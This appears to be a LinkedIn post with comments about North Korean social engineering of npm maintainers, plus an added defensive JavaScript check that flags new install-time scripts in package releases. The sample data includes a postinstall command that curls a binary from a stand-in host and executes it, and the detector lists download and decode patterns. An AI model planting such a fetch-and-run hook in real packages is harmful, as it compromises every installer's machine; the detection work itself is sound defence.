North Korea Targets npm Maintainers for Package Access


North Korea is targeting npm maintainers -- not for crypto, but for write access to packages downloaded trillions of times a year. Several Socket engineers were targeted in this campaign -- myself, Jordan Harband, John-David D., and others. None of us fell for the bait. Unfortunately, the axios maintainer did. No shame in that -- these aren't phishing emails. They're weeks-long ops with fake companies, fake Slack workspaces, and spoofed meeting platforms with convincing Zoom/Teams interfaces built on the official SDKs.

Other confirmed targets: Matteo Collina (Fastify, Pino, Undici, Node.js TSC Chair), Wesley Todd (Express TC), Pelle Wessman (mocha, neostandard). The common thread? High-trust maintainers with publish access to packages that sit deep in everyone's dependency tree.

The attack chain: build rapport over weeks, schedule a video call, fake an audio error, prompt the target to install a "fix." That fix is a RAT. Once it's on your machine, they have your .npmrc tokens, browser sessions, AWS creds, keychain. 2FA doesn't matter. OIDC publishing doesn't matter. Game over.

Security researcher @tayvano_ linked this to UNC1069, a DPRK-nexus group Mandiant has tracked since 2018. Their reasoning is brutal in its simplicity: why social engineer one rich person when you can compromise one maintainer and reach millions of machines?

This is the threat model now. If you maintain popular packages, act accordingly. If you use open source (and you certainly do), act accordingly.

Full writeup: https://lnkd.in/dsjmBcvg

Do we have any proof that it's North Korea and not CIA, or intelligence from other countries?

They tried getting me too. Fortunately, the Slack connection request was a red flag because it's never happened to me without a prior conversation.

The part that should worry every security team is that 2FA and OIDC publishing are both irrelevant once the maintainer's machine is compromised. The entire npm trust model assumes the human behind the credentials is legitimate. There's no behavioral signal that flags when a trusted publisher suddenly pushes a version with a post-install binary download after 200 releases of pure JS. We audited our own dependency tree after the axios incident and found 4 packages where the sole maintainer has no succession plan. If that person gets compromised, the blast radius is our entire CI pipeline.

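The post's point that a stolen maintainer session makes 2FA and OIDC irrelevant, and the comment's "post-install binary download after 200 releases of pure JS" signal, both come down to the same gap: the registry trusts the publisher, so the consumer has to notice when a release changes what runs at install time. The following is an added example written for this page, not code from Socket, npm, or any of the maintainers named here. It compares a candidate release's package.json against the package's earlier manifests and reports newly introduced or changed install-time lifecycle scripts plus download-and-execute patterns inside them. The package name, version history, host name and the SUSPICIOUS pattern list are constructed for illustration; the hook names in INSTALL_HOOKS are npm's actual lifecycle script names.

```javascript
// Added example for this page (not Socket's, npm's or any maintainer's code):
// flag an npm release that newly introduces an install-time lifecycle script,
// or whose install script looks like "download a binary and run it", by
// comparing the candidate manifest against the package's earlier manifests.

// npm's install-time lifecycle hooks; these run on the consumer's machine.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristic patterns, constructed for this example; tune them for your own tree.
const SUSPICIOUS = [
  { name: 'remote-fetch', re: /\b(curl|wget|Invoke-WebRequest)\b/i },
  { name: 'url', re: /https?:\/\//i },
  { name: 'inline-eval', re: /\bnode\s+-e\b|\beval\(|new Function\(/ },
  { name: 'chmod-exec', re: /\bchmod\s+\+x\b/ },
  { name: 'base64', re: /\bbase64\s+(-d|--decode)\b|['"]base64['"]/ },
];

// Extract only the install-time hooks from a manifest's "scripts" block.
function installHooks(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  const hooks = {};
  for (const hook of INSTALL_HOOKS) {
    if (typeof scripts[hook] === 'string') hooks[hook] = scripts[hook];
  }
  return hooks;
}

// history: earlier manifests, oldest to newest. candidate: the new release.
// Returns a list of findings; an empty list means nothing changed at install time.
function auditRelease(history, candidate) {
  const findings = [];
  const prior = history.map(installHooks);
  const everHadHooks = prior.some((h) => Object.keys(h).length > 0);
  const current = installHooks(candidate);

  for (const [hook, cmd] of Object.entries(current)) {
    // Most recent earlier release that defined this hook, if any.
    const previous = [...prior].reverse().find((h) => h[hook] !== undefined);
    if (previous === undefined) {
      // A package that never ran anything at install time suddenly does: loudest signal.
      findings.push({
        severity: everHadHooks ? 'medium' : 'high',
        hook,
        reason: `new ${hook} script after ${history.length} release(s) without one`,
        command: cmd,
      });
    } else if (previous[hook] !== cmd) {
      findings.push({ severity: 'medium', hook, reason: `${hook} script changed`, command: cmd });
    }
    // Independently of history, look for fetch-and-execute behaviour in the hook itself.
    for (const p of SUSPICIOUS) {
      if (p.re.test(cmd)) {
        findings.push({ severity: 'high', hook, reason: `${hook} matches ${p.name}`, command: cmd });
      }
    }
  }
  return findings;
}

// Constructed sample manifests: three pure-JS releases, then one that adds a
// postinstall that fetches and executes a binary from an example host.
const HISTORY = [
  { name: 'example-lib', version: '1.7.0', scripts: { test: 'mocha', build: 'tsc -p .' } },
  { name: 'example-lib', version: '1.7.1', scripts: { test: 'mocha', build: 'tsc -p .' } },
  { name: 'example-lib', version: '1.7.2', scripts: { test: 'mocha', build: 'tsc -p .' } },
];
const CANDIDATE = {
  name: 'example-lib',
  version: '1.7.3',
  scripts: {
    test: 'mocha',
    build: 'tsc -p .',
    postinstall: 'curl -fsSL https://cdn.example.test/helper -o helper && chmod +x helper && ./helper',
  },
};

function printReport(history, candidate) {
  const findings = auditRelease(history, candidate);
  for (const f of findings) console.log(`[${f.severity}] ${f.reason}: ${f.command}`);
  return findings.length;
}

printReport(HISTORY, CANDIDATE);
```

In practice the history comes from the registry (for example `npm view <pkg> versions` and each version's manifest) and the check runs in CI before a lockfile update lands; treat any high finding as a block rather than a warning. The check only covers install-time hooks, so it says nothing about malicious code that runs at require() time, and it cannot tell a compromised maintainer from a legitimate one; it only notices that the package started behaving differently.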


Offloading every event as North Koreans sounds cool, but the reality is there are a lot more groups from around the world, from just about every country you can think of. Unless you have IP logs or geo data as factual proof, you can't say that these attempts are by Korea. Realistically speaking, there are African groups, North American, Brazil, Colombia, Philippines, Chinese, Indians and a lot more groups, but you hardly see their names in the media despite one's server logs showing their attempts. One needs to wonder why that is?
